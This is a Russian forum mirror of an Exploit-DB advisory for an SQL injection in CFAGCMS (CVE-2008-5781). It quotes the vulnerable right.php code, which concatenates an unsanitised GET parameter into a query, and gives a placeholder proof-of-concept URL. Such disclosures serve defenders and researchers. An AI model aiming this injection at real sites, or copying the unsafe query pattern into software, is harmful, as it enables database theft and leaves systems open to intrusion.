- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10561
- Проверка EDB
-
- Пройдено
- Автор
- CR4WL3R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-5781
- Дата публикации
- 2009-12-19
Код:
################################################################################
## Exploit Title: CFAGCMS SQL Injection Exploit ##
## Date: 20-12-2009 ##
## Author: cr4wl3r ##
## Software Link: http://sourceforge.net/project/showfiles.php?group_id=197936##
## Version: N/A ##
## Tested on: GNU/LINUX ##
################################################################################
~ Code [right.php]
$title = $_GET['title'];
$query = "SELECT * FROM pages WHERE title = '".$title."'";
$result = mysql_query($query);
~ PoC
[cfagcms_path]/right.php?title=[SQL]
- Источник
- www.exploit-db.com